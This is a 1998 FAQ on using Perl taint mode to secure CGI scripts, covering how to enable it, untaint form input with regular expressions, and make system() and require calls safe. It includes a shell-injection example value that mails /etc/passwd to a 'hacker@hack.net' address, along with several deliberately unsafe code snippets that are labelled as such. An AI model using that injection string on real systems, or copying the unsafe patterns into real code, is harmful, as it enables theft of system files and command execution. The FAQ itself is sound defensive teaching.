Gunther Birznieks
<gunther@clark.net>
Version 1.0, June 3, 1998
What is taint mode? Why do I need it?
Freeware CGI Scripts are available for download all over the Web.
But how many of them are really
secure? When you download a script do you check all the logic to make
sure it is secure? Do you read through each line of code and anticipate
all the ramifications? Most of the time the answer is "no". After all,
the whole point of downloading software is to get it and run it for free
WITHOUT having to do a lot of work.
I'm writing this to tell you that there isn't any free lunch out there. The more
complicated a CGI script is, the more likely you will want to find someone
else who has already programmed it and avoid doing the work yourself.
The problem is that
regardless of how good the author is, every large program has a good
probability of having bugs -- some of them may be security bugs.
One very good way to lock out security bugs in Perl code is to turn on
TAINT mode. TAINT mode puts a Perl script into "PARANOID" mode and treats
ALL user supplied input as tainted and bad unless the programmer
explicitly "OKs" the data.
How do I use taint mode in my CGI/Perl script?
If your site has Perl 5 on it, change the line at the top of your CGI
script from
#!/usr/local/bin/perl
to
#!/usr/local/bin/perl -T
Note: your path to the Perl executable may vary depending on your server.
If your site has Perl 4 on it, change the line at the top of your CGI
script from
#!/usr/local/bin/perl
to
#!/usr/local/bin/taintperl
Notice that Perl 4 does not support the -T flag. Instead, version 4 of
Perl distributions typically come with a separate executable altogether,
"taintPerl".
Windows NT and other non-UNIX Web servers may have trouble
recognizing the first magical line of a Perl script. Executing
the first line of a script with the command parameters in there
is a UNIXism. Read the next section for issues involved in activating
taint mode on WinNT, Win95/98, or Mac.
|
How do I activate taint mode on non-UNIX servers?
CGI Scripts running on non-UNIX Servers typically do not recognize
the magical #!/usr/local/bin/perl first line of the script. Instead,
the web server knows what language to execute the server with because
of an operating system or web server configuration variable.
For example, for IIS on NT, you should change the association of Perl
scripts to run with taint mode on. Unfortunately, this changes the association
for ALL your Perl scripts which you may not want.
A more reasonable way is to get around the problem
by creating a second extension under NT such as
tcgi or tgi and associate it with taint mode Perl.
Then, rename the scripts with the new extension to activate
taint mode on them.
You could also try using another web server that understand
the first line of scripts. For example, SAMBAR v4.1, a freeware
NT web server, can be configured to run the script based on the
first line of the cgi script. In this case, you would change the
first line to read something like the following:
#!c:\perl\bin\perl.exe -T
Once I activate taint mode is that it?
Unfortunately, no.
You should test your script thoroughly to see if
turning on taint mode stops anything from occuring. Usually the majority
of your script will work fine. In fact if you are lucky, the whole
program may work without any changes at all!
The major caveat is that taint mode is not a compile time check.
It is a run-time check.
Run-time checking means that taint mode Perl is constantly and vigilantly
checking to see if the script is going to do anything unsafe with user
input while the program runs. It does not stop checking after the script
first compiles (compile-time checking).
Run-time checking means that you need to test all logical paths of execution
your script might take so that "legal operations" do not get halted
because of taint mode.
OK, So what are the details of what I need to change?
To get an introduction to some basic cases of what taint mode considers
"unsafe", I recommend reading the Perl documentation on taint mode.
The O'Reilly "Programming Perl" reference book is a good introductory source of
information. The section in the book is called "Handling Insecure Data".
The same basic information in there can also be found
on-line in the UNIX distribution of Perl. On UNIX,
typing "perldoc perlsec" will bring up the Perl Security
documentation.
If you are not using UNIX, there is a possibility that this
command will work on your particular operating systems'
distribution of Perl anyway. However, if it does not
work, you can always look up this information on-line. The "perlsec"
guide is located at
http://www.perl.com/CPAN/doc/manual/html/pod/perlsec.html.
In addition, Lincoln Stein's
WWW-Security FAQ has an excellent introduction to safe scripting in
Perl.
On a CGI script, the only user input is basically user submitted form
data. It is this user input that the Perl script will consider "tainted".
This does NOT mean that you have to immediately go through a lot of hoops
to untaint ALL the form variables that come in. Not only would that be a
big pain, but its unnecessary.
Instead, Perl only considers the COMBINATION of form variables plus the
use of a potentially "unsafe" operation to be illegal. Potentially "unsafe"
operations are operations that have a potentially permanent destructive
effect if the wrong parameters are passed.
Potentially unsafe operations include, but are not
necessarily limited to, system calls of any sort such as using system(),
backticks or piped open() calls, open calls that can write to disk,
unlink() which deletes files, and rename().
For the sample code given, it is assumed that the associative array %form_data
contains the form data that was passed to the CGI script where the key is the
field name and the value is the value of the HTML Form field.
Since this FAQ is meant to be useful for both Perl 4 and 5, I have not used
CGI.pm syntax. If you are using Perl 5 and CGI.pm as your library, your tainted
variables would be coming out of $query->param() method in the CGI object.
I use "mail" as an example program, but really the examples here apply to any system
call with command line parameters. If you actually want to email from CGI scripts
you may want to consider the more secure method described further in the
system call section of this FAQ.
|
For example, if $form_data{"email"} is "tainted", then the following would
still be legal:
print $form_data{"email"} . "\n";
because the print command is not an unsafe operation.
But if you try to pass the same variable to an unsafe version
of a system call
system("mail " . $form_data{"email"});
Perl will complain and not allow this. Making an unsafe system call
plus passing form data as a command line argument is
terribly unsafe. Consider what
would happen if someone entered an email address on the form like
"me@mydomain.com; mail hacker@hack.net < /etc/passwd"
Clearly, there are security ramifications. With taint mode turned on
though, the Perl interpreter will stop this from occuring at all. However,
Perl can't tell what is in the form_data variable -- it just assumes it is
tainted whether it is friendly or not.
Thus, if you want to do that type of command with a user supplied variable,
you must always untaint it regardless of whether it contains harmless input or
not. Remember, Perl only sees that the string was created as a result of
user input (such as a form variable). It has no way of knowing whether the
string is safe or not until you untaint it with the techniques listed here.
Even HIDDEN form tags which are not directly entered
by a user are considered tainted by Perl. In other words, all form
data passed to the CGI script is considered tainted by Perl.
|
To untaint a variable, you use regular expressions
The only way to untaint a variable is to do a regular
expression match using () groups inside the regular expression
pattern match.
In Perl, the first () group match gets assigned to $1, the
second () group to $2, and so on.
Perl considers these new
variables that arise from () groups to be untainted. Once
your regular expression has created these variables, you
can use them as your new untainted values.
The following will illustrate this:
EMail addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an
@ sign. So we want to match this descriptive template. But there is a catch!
If we allow email addresses to have dashes, a lot of programs use dash to
signify a command-line parameter! So although we allow dashes in the email
address, if you want to be extra careful, make sure that the first character of
the email address is only a word character and does not contain dashes or periods. The likelihood
that someone really has an email address that begins with a period of dash is relatively low unless
they are the singer formerly known as Prince.
Thus, our descriptive template becomes the following:
- Match first character as a word character, no extra ones allowed like dashes.
- Match 0 or more subsequent characters as word characters which can also include
dashes and periods.
- Match at least one @ symbol after the preceding two rules.
- Match every character (at least one) for the domain name of the email server
after the @ symbol. This can consist of word characters, dashes, and periods.
The regular expression for this template minus the grouping () we would use for
untainting is:
/\w{1}[\w-.]*\@[\w-.]+/
Further, let us assume that somewhere in the program a variable called
$email has been assigned from $form_data{"email"} which contains a value
submitted by the user from an HTML form using a statement like the following:
$email = $form_data{"email"};
Notice that $email is now tainted as well. This is because its value arose
directly from another variable that contained tainted (user input) data,
namely $form_data{"email"}.
So to untaint a variable called $email, you would do the following
with a regular expression.
if ($email =~ /(\w{1}[\w-.]*)\@([\w-.]+)/) {
$email = "$1\@$2";
} else {
warn ("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $email: $!");
$email = ""; # successful match did not occur
}
OK. Let's go over this in a little more detail.
Basically, when you use
() inside a regular expression, each group of parentheses is mapped to a
$# variable where # is the number mapped to however many groups you have.
For example, the first set of parenthesis that matches in the
regular expression is referred to as $1.
In the above example, the first parentheses surround (\w{1}[\w-.]*).
This matches one or more word
characters, dashes, and periods with at least one word character before it which
does not contain dashes or periods.
Because of the parentheses, this first match gets assigned
to $1 by Perl.
Then, an @ symbol is matched.
Finally, the second set of
parentheses ([\w-.]+) matches one or more of any word characters, dashes, and
periods. This second match gets assigned to $2 by Perl.
If the regular expression is successful, $1 (first parenthetical match)
will equal the username portion of the email address and $2 (second
parenthetical match) will equal the domain portion.
Thus, the next command, $email = "$1\@$2"; replaces the
previously tainted email variable with the safe counterparts:
$1 followed by an @ symbol followed by $2.
Notice that $1 and $2 are both considered untainted now. This
is very important to see.
Yes, they did
arise from the user input data, but Perl considers these variables
special. Perl basically believes that because they resulted
from a regular expression you set up, that you have explicitly
checked the data for validity in that regular expression. Thus, $1
and $2 are not considered tainted.
On the other hand, if the user entered an email address that did not match this
"template", $1 and $2 will equal nothing because the regular expression
will have failed. The example above would assign $email = "" in this case
as part of the else {} clause.
Of course, if the user is trying to hack your system, this is a good
thing. You only want valid email addresses to come through. You should
generally check for the failure of the regular expression as was done
above by the else {} clause and do something about the bad data.
As an additional plus, checking for the failure of the regular expression
allows you to use something like warn to print an informational message to STDERR
about the variable that did not pass along with the IP address that tried to pass
it as I have done in the above example.
When a CGI script prints to STDERR, that
output goes to your errorlog. You should always check your errorlog for
potential hack attempts. Of course, you could always be more sophisticated
such as email the bad data directly to you so you would be notified right away.
Also, if you are really worried about your
program's integrity, you could use die() instead of warn() to stop the program
rather than quietly warning you.
If you are doing more than one taint check, if the
second taint check fails, the previous values of $# (eg
$1 or $2) will remain what they were before.
Unless you are sure that this is the only
variable you are taint checking, it is best to
check the match with an IF/ELSE statement as
demonstrated above.
|
Do I have to untaint all my variables?
No.
Both of the following must happen before you have to worry
about untainting a variable.
[1] The variable was assigned based on user input. Or the
variable was assigned from a variable that was tainted itself.
AND
[2] The variable will be used in a way that could compromise
system safety such as writing a file.
For example, the following is OK because printing to the STDOUT
is not an unsafe operation even though the variable came from
a form variable.
# %form_data contains an associative array
# of values the user entered on a form
#
# This is SAFE, printing is a safe operation
# regardless of user input or not.
#
$filename = $form_data{"session_file"};
print "The filename was $filename\n";
In addition, the following is OK, because although the file
is being opened for writing (a potentially unsafe operation),
the filename variable was assigned within the program NOT as a
result of user input.
# SAFE, FILENAME is assigned in the program itself
$filename = "./TempFiles/mytempfile.dat";
open (TEMP, ">$filename");
However, the following IS unsafe because the variable came from
user input AND it is being used in a potentially unsafe operation --
opening a file for writing.
Note, opening a file for writing is unsafe
because if the filename is corrupt, then the user input could tell the
script to write over ANY file in the system which is a huge
security hole.
# UNSAFE!!! Taint Will Complain!
$filename = $form_data{"session_file"};
open (SESSION, ">$filename");
The easiest way to test if taint mode is having a problem
with a particular form variable is to simply activate taint mode
as described earlier and then test the program.
Any errors that result in the script not executing will be caught
and logged in your web server's errorlog. This should be the number
one place you look at to troubleshoot taint mode.
Here are some common unsafe operations which will stop the Perl program
from executing if user input used with them is not untainted first:
- Unsafe System() calls (discussed as a special case below).
- Require()ing library files
- Anything that writes to the file system such as open
with > or >>, unlink, rename
If I "know" my variable is safe, why don't I just clear taint mode?
DON'T DO THIS!!!
Perl probably has a good reason for thinking the input is
unsafe. For example, there is a common misconception that HIDDEN INPUT
tags on a FORM that are generated by a CGI script is "safe". This is not
true! A user could easily mimic your form by making their own HTML form
with bogus values.
Taint mode will catch all this. Avoid the temptation to quickly dismiss a
tainted variable by using an "open" Regular expression.
THE FOLLOWING IS BAD AND SHOULD NOT BE DONE:
$email =~ /(.*)/;
$email = $1;
This will match ANY expression. Thus, effectively no check
has actually been done.
Recall that Perl considers $1 to be safe now because it trusts that you
tested the validity of the variable using the regular expression. Perl
does not judge your regular expression. If you choose to make it too loose
like the above regular expression, then Perl will let you.
If you do this, you are short changing the point of taint mode which is to
make you sit down and think "What input do I really want and how do I
restrict myself to JUST that set of characters?".
How do I fix system() calls in taint mode?
When you make a system call to an external program or use its sister
command, exec, taint mode also
stops this from happening if the PATH has not been adjusted. Again, since
a string is being passed to the system call, Perl generally has trouble
figuring out whether a relative or absolute path to a command has been
passed. Being in "paranoid" mode, Perl stops the command from executing.
The way around this problem is to clear the PATH environment variable so
that Perl can trust that the command passed as a system call is an
absolute path to a command instead of being part of the search path.
You might ask "What is unsafe about the path?". Historically, path's are
considered unsafe because if there are multiple versions of an executable,
it is difficult to tell which one is actually being executed. If there is a
bug in one of the versions, then this can pose a security hazard.
Basically, before doing a system call, clear the PATH by issuing a
statement like the following
$ENV{"PATH"} = "";
Note, this does not just apply to the system() call. It also applies to
opening up files with the | symbol (which executes a command) or using
backticks `` to execute an external command. Of course, now you will need
to call the command using an absolute path.
By the way, some system calls are more secure than others. The example
given before, system("mail $email"), is insecure. Behind the
scenes, Perl takes a single string argument to system() and passes it
to a shell for parsing if there are any shell interpretable meta characters.
But system("mail",
$email) is secure because it does not spawn a shell to execute the
command. The reason it does not spawn a shell is that each argument
has been preprocessed by the programmer into separate strings. Thus,
Perl does bother passing the string to a shell for processing.
Thus, the $email variable will not have a chance of being
executed as a command as part of the shell processing step.
I strongly advise untainting the variables passed to system() even
if you use the "safer" separated arguments version of the system() call.
It is entirely possible that the program you are calling via
a system() call actually calls other programs or uses
the data passed to it in an unsafe way. In turn those programs may
call other programs very much like the Russian dolls that
expose yet another doll every time one is opened.
It doesn't take much
extra coding to untaint variables and be "safe rather than sorry".
|
Another quick security note. Typically instead of passing $email as a
parameter to mail, it is more secure to open up a pipe to the sendmail
program with a "-t" parameter. This makes sendmail accept the To: and
From: email addresses as STDIN instead of command line parameters. The
mail-lib.pl library from the
Selena Sol Scripts Archive uses this more
secure method of sending email.
How do I fix problems with require or use statements in taint mode?
The Perl require and use statements also change slightly when taint mode
is turned on. Basically, the path to load libraries/modules no longer
contains "." (the current directory) from its path.
So if you load any libaries or modules relative to the current working
directory without explicitly specifying the path, your script will
break under taint mode.
To further illustrate this, normally you can read a setup file
in the current working directory in a CGI script
with a command like:
require "myscript.setup";
However, this will not work when taint mode is on.
Instead, you must tell
the require statement explicitly where to load the library since
"." is removed during taint mode from the @INC array.
@INC contains a list of valid paths to read library files and
modules from.
If taint mode is on, you would simply change the above
require code to the following:
require "./myscript.setup";
This lets Perl know that the myscript.setup will be explicitly
loaded from the current directory. Alternatively, you could
add the following command:
use lib qw(.);
"use lib" tells Perl to add the list of passed directory names
inside qw() to the @INC array.
You may be wondering why I advocate adding the capability
of loading relative libraries back into the script when
taint mode is turned on. After all, isn't taint mode doing
this to protect me? What is taint mode protecting?
Well, the issue with @INC is really more of a problem
with SUID scripts than CGI scripts. When you have an SUID script
that can execute with the permissions of another user (such as root),
Perl goes into taintmode automatically.
For this SUID script case, it would be a huge
security breach to have the capability of loading libraries from
the user's current directory. If a script ends up having a bug
where the library is not found in the normal directory path, then
a user could exploit this by writing their own, malicious version
of the library, putting it in the current directory, and running
the SUID script from their current directory.
However, this is not really the same problem with CGI scripts.
User's are not executing your script from arbitrary directories.
Your web server controls which directory the script is called from.
So keeping "." in @INC is not really a problem compared to SUID scripts
which operate under taint mode automatically.
Some more taint mode tips
1. Consider logging bad taint/regular expression matches
If your taint cleaning results in a bad regular expression match, you
might want to set up code to detect this and log it or email this fact to
you. That way, you can see if people are trying to hack your script.
2. Use the web server's errorlog
If you turn on taint mode and there is a problem occuring so the
script does not seem to work, you can find out the specifics behind the
problem by examining your server's errorlog. Encourage your ISP to help
you secure your scripts by giving you access to errorlogs if you don't
have it.
A smart ISP will encourage safe CGI scripting practices. If they don't,
you don't want that ISP since other users may be developing unsafe CGI
on your virtual web server.
3. There's more to safe CGI scripting than taint mode
Always be vigilant. There may be other holes. For example, the "Russian
Doll" scenario that I outlined above could get past taint mode.
Taint mode helps a LOT, but it is not the end of safe CGI scripting.
Always ask yourself, "Is there a way someone could break through this?"
4. Read other WWW Security references
Read the WWW-Security FAQ
by Lincoln Stein and other security
resources. Keeping up with the latest security issues is absolutely
crucial to promoting safe CGI.
Acknowledgements
The following have helped with the creation of this FAQ by
providing valuable feedback during its development: Anthony Masiello,
Joseph Ryan, Ignacio Bustamante, Fred Taheri, Mark McDonald, Dan Berkowitz,
Peter Chines, Selena Sol.
|